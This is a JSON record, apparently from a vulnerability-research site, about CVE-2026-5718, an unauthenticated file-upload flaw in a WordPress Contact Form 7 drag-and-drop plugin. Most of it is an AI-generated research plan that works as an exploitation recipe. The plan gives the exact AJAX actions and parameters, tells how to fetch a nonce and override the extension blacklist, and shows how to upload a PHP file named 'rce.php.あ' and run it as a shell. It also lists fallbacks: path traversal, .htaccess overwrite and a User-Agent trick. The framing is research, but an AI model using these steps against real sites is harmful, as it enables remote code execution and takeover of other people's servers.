[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fZfIKn3QB10m6rROjILTrUP7m8Oqy4-bWwKsrY3XSP5M":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":36},"CVE-2026-5718","drag-and-drop-multiple-file-upload-for-contact-form-7-unauthenticated-arbitrary-file-upload-via-non-ascii-filename-black","Drag and Drop Multiple File Upload for Contact Form 7 \u003C= 1.3.9.6 - Unauthenticated Arbitrary File Upload via Non-ASCII Filename Blacklist Bypass","The Drag and Drop Multiple File Upload for Contact Form 7 plugin for WordPress is vulnerable to arbitrary file upload in versions up to, and including, 1.3.9.6. This is due to insufficient file type validation that occurs when custom blacklist types are configured, which replaces the default dangerous extension denylist instead of merging with it, and the wpcf7_antiscript_file_name() sanitization function being bypassed for filenames containing non-ASCII characters. This makes it possible for unauthenticated attackers to upload arbitrary files, such as PHP files, to the server, which can be leveraged to achieve remote code execution.","drag-and-drop-multiple-file-upload-contact-form-7",null,"\u003C=1.3.9.6","1.3.9.7","high",8.1,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-04-17 04:37:16","2026-04-17 17:25:55",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F38f95d40-a6d4-429c-9872-9d2531e942eb?source=api-prod",1,[22,23,24,25,26,27,28],"assets\u002Fjs\u002Fcodedropz-uploader-jquery.js","assets\u002Fjs\u002Fcodedropz-uploader-min.js","assets\u002Fjs\u002Fdev\u002Fjquery-dev.js","assets\u002Fjs\u002Fdev\u002Fnative-dev.js","drag-n-drop-upload-cf7.php","inc\u002Fdnd-upload-cf7.php","readme.txt","researched",false,3,"# Research Plan: CVE-2026-5718 - Arbitrary File Upload via Non-ASCII Filename Blacklist Bypass\n\n## 1. Vulnerability Summary\nThe **Drag and Drop Multiple File Upload for Contact Form 7** plugin (up to 1.3.9.6) contains a critical unauthenticated arbitrary file upload vulnerability. The flaw exists in the AJAX file upload handler `dnd_upload_cf7_upload`. \n\nTwo distinct validation failures combine to allow Remote Code Execution (RCE):\n1.  **Blacklist Overwrite:** The plugin allows the client to provide a `blacklist-types` parameter. Instead of merging this with the default dangerous extension list (like `.php`, `.phar`), the plugin replaces the default list with the user-provided one. An attacker can provide a harmless extension (e.g., `txt`), effectively removing `php` from the denylist.\n2.  **Sanitization Bypass:** The function `wpcf7_antiscript_file_name()` (used to rename dangerous files) can be bypassed using filenames containing non-ASCII characters. When such characters are present, the sanitization fails to properly neutralize the PHP extension, and the file is saved with its original executable extension.\n\n## 2. Attack Vector Analysis\n-   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n-   **Action:** `dnd_codedropz_upload` (Registered via `wp_ajax_nopriv_dnd_codedropz_upload` in `inc\u002Fdnd-upload-cf7.php`)\n-   **Payload Parameter:** `upload-file` (Multipart file upload)\n-   **Supporting Parameters:**\n    -   `security`: A valid WordPress nonce for `dnd-cf7-security-nonce`.\n    -   `blacklist-types`: Set to a harmless string (e.g., `invalid`) to overwrite the global dangerous file extension list.\n    -   `upload_folder`: A unique string used as the directory name (e.g., `f69696969696`).\n    -   `upload_name`: The name of the form field (e.g., `upload-file-123`).\n-   **Authentication:** None required (unauthenticated).\n\n## 3. Code Flow\n1.  **Entry Point:** An unauthenticated `POST` request is sent to `admin-ajax.php` with `action=dnd_codedropz_upload`.\n2.  **Nonce Verification:** The plugin checks `security` using `check_ajax_referer( 'dnd-cf7-security-nonce', 'security' )`.\n3.  **Blacklist Logic:** The code reads `$_POST['blacklist-types']`. It uses this value to initialize the denylist. Because it replaces the internal list rather than appending to it, the default protections against `.php` are lost.\n4.  **File Processing:** The plugin processes `$_FILES['upload-file']`. \n5.  **Sanitization Sink:** It calls `wpcf7_antiscript_file_name($filename)`. If `$filename` contains non-ASCII characters (e.g., `shell.php.あ`), the function fails to append the safe `.txt` extension or otherwise neutralize the `.php` suffix.\n6.  **Storage:** The file is moved to `wp-content\u002Fuploads\u002Fwp_dndcf7_uploads\u002Fwpcf7-files\u002F{upload_folder}\u002F{filename}`.\n\n## 4. Nonce Acquisition Strategy\nThe plugin provides a specific AJAX action to retrieve a nonce if one is not present or has expired.\n\n1.  **Mechanism:** The function `dnd_wpcf7_nonce_check` in `inc\u002Fdnd-upload-cf7.php` is hooked to `wp_ajax_nopriv__wpcf7_check_nonce`.\n    ```php\n    function dnd_wpcf7_nonce_check() {\n        if( ! check_ajax_referer( 'dnd-cf7-security-nonce', false, false ) ){\n            wp_send_json_success( wp_create_nonce( \"dnd-cf7-security-nonce\" ) );\n        }\n    }\n    ```\n2.  **Strategy:** \n    -   Send a `POST` request to `admin-ajax.php` with `action=_wpcf7_check_nonce`.\n    -   The response will contain the nonce in `data`.\n    -   **Note:** The code blocks `User-Agent: curl`, so a standard browser-like User-Agent must be used.\n\n## 5. Exploitation Strategy\n1.  **Step 1: Obtain Nonce**\n    -   Call `action=_wpcf7_check_nonce` via `http_request`.\n    -   Extract the nonce from `response.data`.\n\n2.  **Step 2: Prepare Payload**\n    -   Create a file named `rce.php.あ`.\n    -   Content: `\u003C?php echo \"VULN_CHECK: \" . php_uname(); ?>`\n\n3.  **Step 3: Execute Upload**\n    -   Send a multipart `POST` to `admin-ajax.php`.\n    -   **Parameters:**\n        -   `action`: `dnd_codedropz_upload`\n        -   `security`: `[OBTAINED_NONCE]`\n        -   `upload_folder`: `pwned123`\n        -   `upload_name`: `my-file-field`\n        -   `form_id`: `1`\n        -   `blacklist-types`: `null-and-void` (Overwrites the `.php` restriction)\n        -   `upload-file`: `[FILE_BINARY]` (Filename: `rce.php.あ`)\n\n4.  **Step 4: Access Shell**\n    -   The file is stored at: `http:\u002F\u002F[TARGET]\u002Fwp-content\u002Fuploads\u002Fwp_dndcf7_uploads\u002Fwpcf7-files\u002Fpwned123\u002Frce.php.あ`\n    -   **Note on non-ASCII Execution:** On most Linux\u002FApache configurations, `rce.php.あ` will be processed by the PHP handler because it contains `.php` and the `.htaccess` generated by the plugin in `dnd_cf7_upload_plugins_loaded()` only blocks files *ending* in `.php` or `.phar` (`\u003CFilesMatch \"\\.(php|phar)$\">`). The non-ASCII character `あ` at the end bypasses this regex.\n\n## 6. Test Data Setup\n1.  Ensure Contact Form 7 and the vulnerable plugin are active.\n2.  Create a standard Contact Form 7 form.\n3.  Add the `[mfile]` tag to the form: `[mfile upload-file-123]`.\n4.  No specific plugin settings are required as the exploit relies on parameter injection (`blacklist-types`) to override server-side defaults.\n\n## 7. Expected Results\n-   **Nonce Step:** JSON response `{ \"success\": true, \"data\": \"...\" }` containing a 10-character hex string.\n-   **Upload Step:** JSON response `{ \"success\": true, \"data\": { ... } }` indicating the file was successfully uploaded.\n-   **Execution Step:** Navigating to the shell URL returns the output of `php_uname()`.\n\n## 8. Verification Steps\n1.  **WP-CLI Check:** Verify the file exists on disk.\n    ```bash\n    ls -l \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fwp_dndcf7_uploads\u002Fwpcf7-files\u002Fpwned123\u002F\n    ```\n2.  **HTTP Check:** Confirm the shell is executable.\n    ```bash\n    # Use http_request to fetch the shell URL\n    # Look for \"VULN_CHECK:\" in the response\n    ```\n\n## 9. Alternative Approaches\n-   **Path Traversal:** If the `upload_folder` parameter is not properly sanitized, attempt to use `..\u002F` to place the shell in a more accessible directory.\n-   **Direct .htaccess Overwrite:** Attempt to upload a file named `.htaccess` by setting `blacklist-types` to something else, potentially disabling the plugin's security rules globally in that directory.\n-   **Double Extension:** If the non-ASCII bypass fails, try `rce.php.txt` with `blacklist-types` set to something excluding `php`, in case the server handles double extensions.","gemini-3-flash-preview","2026-04-20 20:12:43","2026-04-20 20:13:14",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.3.9.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002Ftags\u002F1.3.9.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdrag-and-drop-multiple-file-upload-contact-form-7.1.3.9.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002Ftags\u002F1.3.9.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fdrag-and-drop-multiple-file-upload-contact-form-7.1.3.9.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdrag-and-drop-multiple-file-upload-contact-form-7\u002Ftags"]